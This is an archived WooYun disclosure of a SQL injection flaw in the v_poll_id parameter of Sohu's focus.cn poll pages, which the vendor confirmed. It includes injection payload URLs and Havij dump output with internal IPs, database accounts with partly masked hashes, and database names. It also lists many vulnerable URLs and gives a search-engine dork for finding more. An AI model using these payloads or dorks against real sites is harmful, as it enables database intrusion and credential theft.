当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059528

漏洞标题:搜狐(第二季)旗下某站通用型sql注入第四集(海量注入点打包)

相关厂商:搜狐

漏洞作者: 浩天

提交时间:2014-05-05 16:46

修复时间:2014-06-19 16:46

公开时间:2014-06-19 16:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-05: 细节已通知厂商并且等待厂商处理中
2014-05-05: 厂商已经确认,细节仅向厂商公开
2014-05-15: 细节向核心白帽子及相关领域专家公开
2014-05-25: 细节向普通白帽子公开
2014-06-04: 细节向实习白帽子公开
2014-06-19: 细节向公众公开

简要描述:

不同的页面程序,都拥有同一个参数,而这个参数却存在注入点,导致不论重要域名还是子域名都存在sql注入的问题
有点累了,都劝我休息一会
都问我用什么辅助设备找到的?我靠的都是双手,一样可以射的很好!!

详细说明:

问题程序主要集中在“投票”页面,注入参数:v_poll_id=
无论重要域名home、house、office等等,还是地区子站,都存在问题
例如:在v_poll_id=4679'后面加个单引号访问,页面报mysqlerror,最下面地址情况是一样的
http://home.focus.cn/group/vote.php?v_poll_id=4679'&group_id=607

3.jpg


然后访问下面的链接,回显数据正常,无报错,说明mysql.user存在
http://home.focus.cn/group/vote.php?v_poll_id=4679' and exists(select * from mysql.user) and '%'='%&group_id=607

4.jpg


但是只能手动穷举暴库,扔到工具里没啥反应,反应异常,但肯定是注入点

漏洞证明:

http://office.focus.cn/group/result.php?v_poll_id=7&group_id=750 用这个尝试吧,扔到havij,office这个读库是成功的,但是也挺慢
Target: http://office.focus.cn/group/result.php?v_poll_id=7&group_id=750
DB Server: MySQL >=5
Resp. Time(avg): 152 ms
Current User: fdbuser@192.168.242.102
Sql Version: 5.1.54-log
Current DB: office
System User: fdbuser@192.168.242.102
Host Name: focus-gvm-160-34-tc
System User: fdbuser@10.10.90.54
Compile OS: unknown-linux-gnu
DB User & Pass: root::localhost
root::focus-gvm-160-34-tc
root::127.0.0.1
Installation dir: /usr/local/mysql-5.1.54-linux-x86_64-glibc23/
root:6a3*******35:192.168.242.%
repadm:*8C3E*********E648DDA3:192.168.%
Sql Version: 5.1.54-log
repadm:*8C3ED*********48DDA3:10.%
mysqlmon:*565E9*********B6C0A37F:10.11.160.34
mysqlmon:*565E9********8B6C0A37F:10.11.160.27
repladmin:3bbf*******bb5fe:192.168.242.%
readonly:5d*******6e19d:%
root:6a3*******35:10.10.90.%
repladmin:3bb********b5fe:10.10.90.%
repadm:*8C3E*******E69B712E648DDA3:10.%.%.%
root:6a3bb*****d35:10.11.24.%
fdbuser:54bc******962c10e:10.11.24.%
fdbuser:54bc******c10e:10.10.90.%
fdbuser:54********62c10e:10.10.127.%
fdbuser:54********2c10e:192.168.242.%
fdbuser:54b********0e:localhost
root:6a**********5d35:10.11.160.%
fdbuser:54********2c10e:10.11.160.%
pingmysql:*565E94**********A37F:10.11.36.20
pingmysql:*565E94D8*********36DE148B6C0A37F:192.168.1.178
pingmysql:*565E94**********8B6C0A37F:192.168.1.139
pingmysql:*565E94D80*********148B6C0A37F:10.10.58.195
pingmysql:*565E94D8*********148B6C0A37F:192.168.1.128
pingmysql:*565E94D805********48B6C0A37F:10.11.36.22
Data Bases: information_schema
cdoffice
chanye
cirea
cyxoffice
gzoffice
mysql
mysql_identity
office
office_forum
office_sort
otheroffice_bak
overseashouse
shoffice
shoffice_rent
shop
shop_forum
shop_sort
shopbak
shrentsale_822
shrentsale_913
szoffice
szoffice_rent
szrentsale_822
szrentsale_913
test
tjoffice
下面这个也都是注入点,需要通查“投票”程序v_poll_id参数的处理
http://office.focus.cn/group/vote.php?v_poll_id=7&group_id=750
http://home.focus.cn/group/vote.php?v_poll_id=4679&group_id=607
http://house.focus.cn/group/switch.php?v_poll_id=15386&group_id=3574&m=0&submit=%B2%E9%BF%B4%BD%E1%B9%FB
地区子域名
http://cq.focus.cn/group/result.php?v_poll_id=36&group_id=40000
http://sx.focus.cn/common/group/poll/result.php?v_poll_id=98&group_id=530004
http://bb.focus.cn/common/group/poll/result.php?v_poll_id=4&group_id=2000367
......
数不胜收
搜索引擎,一搜一大堆吖
site:focus.cn inurl:v_poll_id=

修复方案:

准备休息一会

版权声明:转载请注明来源 浩天@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-05-05 16:54

厂商回复:

感谢对搜狐安全关注

最新状态:

暂无